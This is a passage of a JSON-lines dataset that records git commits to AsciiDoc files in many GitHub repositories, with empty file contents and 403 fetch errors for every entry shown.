'https:\/\/github.com\/s-f-ek971\/s-f-ek971.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f2d229a39847438cbdb81207536df03e6ccca74","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b81833f23373f50edfa8c27eb57854795822155","subject":"Create team.adoc","message":"Create team.adoc\n\nCreated missing team 
document.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/team.adoc","new_file":"src\/docs\/asciidoc\/team.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"49c9762aff2b8a8487688da963f766f610ddcf71","subject":"Add git-sync.adoc","message":"Add git-sync.adoc\n","repos":"toalexjin\/git-scripts","old_file":"doc\/git-sync.adoc","new_file":"doc\/git-sync.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/toalexjin\/git-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84f10e1ba9d411a3da52db022d7750f6dc9da374","subject":"Update 2019-08-27-promise.adoc","message":"Update 2019-08-27-promise.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-08-27-promise.adoc","new_file":"_posts\/2019-08-27-promise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb5a7a77f22b2b0ff0cdd1d19f78ba71b273ccbe","subject":"Update 2018-06-24-Laravel56-Request.adoc","message":"Update 2018-06-24-Laravel56-Request.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_file":"_posts\/2018-06-24-Laravel56-Request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35678fa0865de26c5f15ce2cbb121b6ce35d8def","subject":"Update 2014-03-17-One-Formatter-to-rule-them-all.adoc","message":"Update 2014-03-17-One-Formatter-to-rule-them-all.adoc","repos":"velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io,velo\/velo.github.io","old_file":"_posts\/2014-03-17-One-Formatter-to-rule-them-all.adoc","new_file":"_posts\/2014-03-17-One-Formatter-to-rule-them-all.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/velo\/velo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94407af2018ab2b7ea5e7bf9f8bcbb44a96f80b6","subject":"y2b create post A Mysterious Coca-Cola Surprise...","message":"y2b create post A Mysterious Coca-Cola Surprise...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-28-A-Mysterious-CocaCola-Surprise.adoc","new_file":"_posts\/2017-02-28-A-Mysterious-CocaCola-Surprise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"5d1dcf9ffb0c8ef93ddf1818acd21ef2bfb26209","subject":"added documentation","message":"added documentation\n","repos":"easel\/paas-skeleton,easel\/paas-skeleton","old_file":"docs\/patton.adoc","new_file":"docs\/patton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/easel\/paas-skeleton.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecabf0b0c261fd241d076e8bfde53f3e2e345fdc","subject":"ex 5 text","message":"ex 5 text\n","repos":"cybercomsweden\/javaee-exercises,christer155\/javaee-exercises,christer155\/javaee-exercises,cybercomsweden\/javaee-exercises,ivargrimstad\/javaee-exercises,ivargrimstad\/javaee-exercises","old_file":"exercise-5\/README.adoc","new_file":"exercise-5\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/javaee-exercises.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80397da70d7f40ece5458678c6a384b6eb9105fc","subject":"Update 2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","message":"Update 2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","repos":"modmaker\/modmaker.github.io,modmaker\/modmaker.github.io,modmaker\/modmaker.github.io","old_file":"_posts\/2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","new_file":"_posts\/2015-07-11-Connecting-Thermocouples-to-the-BeBoPr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/modmaker\/modmaker.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec15bb49911093cf9db9c242351a9e7ab5f23a45","subject":"CAMEL-16341 - Having a middle folder for vertx components","message":"CAMEL-16341 - Having a middle folder for vertx components\n","repos":"adessaigne\/camel,pax95\/camel,pax95\/camel,cunningt\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,cunningt\/camel,nikhilvibhav\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,apache\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,christophd\/camel,pax95\/camel,tadayosi\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,apache\/camel,christophd\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/vertx-kafka-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5e3d351d9fe065d7c14c9b7d9c2a4544fb2bd48","subject":"Fix typos in threads docs","message":"Fix typos in threads docs\n\nThis commit fixes a typo in the threads docs where the past tense form\r\nof a verb was used when current tense is needed.\r\n\r\nRelates 
#22016\r\n","repos":"pozhidaevak\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MaineC\/elasticsearch,ZTE-PaaS\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,fernandozhu\/elasticsearch,wuranbo\/elasticsearch,Helen-Zhao\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,robin13\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,LeoYao\/elasticsearch,mjason3\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,a2lin\/elasticsearch,shreejay\/elasticsearch,gingerwizard\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,mikemccand\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,alexshadow007\/elasticsearch,fernandozhu\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nilabhsagar\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,kalimatas\/elasticsearch,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,C-Bish\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,vroyer\/elasticassandra,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,rlugojr\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,rlugojr\/elasticsearch,LeoYao\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,jprante\/elasticsearch,umeshdangat\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,elasticdog\/elasticsearch,Shepard1212\/elasticsearch,GlenRSmith\/elasticsearch,nazarewk\/elasticsearch,JackyMai\/elasticsearch,gfyoung\/elasticsearch,obourgain\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,markwalkom\/elasticsearch,C-Bish\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,obourgain\/elasticsearch,vroyer\/elasticassandra,qwerty4030\/elasticsearch,JackyMai\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,jimczi\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,mikemccand\/elasticsearch,i-am-Nathan\/elasticsearch,winstonewert\/elasticsearch,brandonkearby\/elasticsearch,artnowo\/elasticsearch,mikemccand\/elasticsearch,nezirus\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,nilabhsagar\/elasticsearch,Stacey-Gammon\/elasticsearch,nknize\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch
,geidies\/elasticsearch,fernandozhu\/elasticsearch,jimczi\/elasticsearch,StefanGor\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch,JackyMai\/elasticsearch,coding0011\/elasticsearch,winstonewert\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,LewayneNaidoo\/elasticsearch,nezirus\/elasticsearch,njlawton\/elasticsearch,markwalkom\/elasticsearch,mortonsykes\/elasticsearch,masaruh\/elasticsearch,jprante\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,Stacey-Gammon\/elasticsearch,wenpos\/elasticsearch,naveenhooda2000\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,bawse\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,fforbeck\/elasticsearch,fforbeck\/elasticsearch,markwalkom\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,elasticdog\/elasticsearch,jimczi\/elasticsearch,glefloch\/elasticsearch,scottsom\/elasticsearch,obourgain\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,fernandozhu\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,artnowo\/elasticsearch,C-Bish\/elasticsearch,vroyer\/elassandra,JSCooke\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,artnowo\/elasticsearch,Helen-Zhao\/elasticsearch,StefanGor\/elasticsearch,robin13\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,obourgain\/elasticsearch,wangtuo\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,rlugojr\/elasticsearch,fred84\/elasticsearch,uschindler\/elasticsearch,mortonsykes\/elasticsearch,Shepard1212\/elasticsearch,StefanGor\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,rajanm\/elasticsearch,mikemccand\/elasticsearch,geidies\/elasticsearch,nezirus\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,lks21c\/elasticsearch,JackyMai\/elasticsearch,markwalkom\/elasticsearch,a2lin\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,MaineC\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,MaineC\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,Helen-Zhao\/elasticsearch,alexshadow007\/elasticsearch,glefloch\/elasticsearch,wuranbo\/elasticsearch,IanvsPoplicola\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,fred84\/elasticsearch,nilabhsagar\/elasticsearch,glefloch\/elasticsearch,artnowo\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,mortonsykes\/elasticsearch,scorpionvicky\/ela
sticsearch,jimczi\/elasticsearch,njlawton\/elasticsearch,s1monw\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,IanvsPoplicola\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,henakamaMSFT\/elasticsearch,LewayneNaidoo\/elasticsearch,fforbeck\/elasticsearch,geidies\/elasticsearch,Shepard1212\/elasticsearch,mjason3\/elasticsearch,lks21c\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,MisterAndersen\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/setup\/sysconfig\/threads.asciidoc","new_file":"docs\/reference\/setup\/sysconfig\/threads.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"606f916b142b1bd70914c5f792db594bf756e35b","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c587b40089991a89dcbb2d76decf87ac3077b35f","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"166d9b7cc590445ef2730ce02d1be6035eda5b97","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 
2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bcc9ae5f230101c2b31319898d4255cbd9f5ce3","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932b96f06f31f6f40d842d8c5f227512856025bf","subject":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","message":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15c154fa95a786de9a376f81bb30e50532f93024","subject":"Update 2015-12-03-Titre.adoc","message":"Update 2015-12-03-Titre.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2015-12-03-Titre.adoc","new_file":"_posts\/2015-12-03-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"621239d446e2215229a24419b33e6c7279377dcf","subject":"added FAQ","message":"added FAQ\n","repos":"ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoopee","old_file":"FAQ.adoc","new_file":"FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c5f6ebd14352e62dea5ff21206539b77dc3dbd","subject":"Moved docs comment to own row (#8993)","message":"Moved docs comment to own row (#8993)\n\n* Moved docs comment to own row\n\nAnyone can read the TODO comment on 
https:\/\/vaadin.com\/docs\/-\/part\/framework\/advanced\/advanced-logging.html. The comment is directly on same row as normal text, which means that it will be printed out when asciidoc is transformed to html. I moved it now to a new row which will make the asciidoc parser treat is as a comment. Please make a proper fix for it.\n","repos":"kironapublic\/vaadin,mstahv\/framework,mstahv\/framework,peterl1084\/framework,asashour\/framework,peterl1084\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin","old_file":"documentation\/advanced\/advanced-logging.asciidoc","new_file":"documentation\/advanced\/advanced-logging.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"071e9831e6cd55aba973e1f6dc69b42963a94e25","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"Turbots\/spring-social,molindo\/spring-social,codeconsole\/spring-social,codeconsole\/spring-social,molindo\/spring-social,Turbots\/spring-social,spring-projects\/spring-social,spring-projects\/spring-social","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Turbots\/spring-social.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa853611f4258b4cd0187587ae5f1ea4b7a7b491","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dba2b5d3337bcb57e6256234594b2794614413af","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b25d6ebd9cb06c4ec9346ae8a2d564beeb36267","subject":"Updated opcodes.asciidoc","message":"Updated opcodes.asciidoc\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"Doc\/opcodes.asciidoc","new_file":"Doc\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b0550c067224c8a44daafb1ddda775a77d2d6e","subject":"Added stub file explaining the plugin and classloader system.","message":"Added stub file explaining the plugin and classloader system.\n","repos":"SBuild-org\/sbuild,SBuild-org\/sbuild","old_file":"Thoughts-PluginSystem.adoc","new_file":"Thoughts-PluginSystem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44c57087e342d595ccb8ba6ec125ebfa0781b7f9","subject":"Update 2017-04-09-What-is-needed-for-good-engineering.adoc","message":"Update 2017-04-09-What-is-needed-for-good-engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-09-What-is-needed-for-good-engineering.adoc","new_file":"_posts\/2017-04-09-What-is-needed-for-good-engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfba43e209a4dc0172f82a9192112432bd181fa2","subject":"Problem: installation of emerald-rs is not accurate","message":"Problem: installation of emerald-rs is not accurate\n\nSolution: give correct instructions to install emerald-rs\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd0b41f8437e7cd8d1cf865207e6b6526ae576ff","subject":"adds README (#8)","message":"adds README (#8)\n\n","repos":"arquillian\/arquillian-cube-q","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arquillian\/arquillian-cube-q.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac4d5b303001daae1c72ebf710af456193ad409f","subject":"Here is the doc!","message":"Here is the doc!\n","repos":"chevdor\/sql2asciidoc","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chevdor\/sql2asciidoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a58da2b80be3e2ca3cad440540a6acb7b65423e4","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 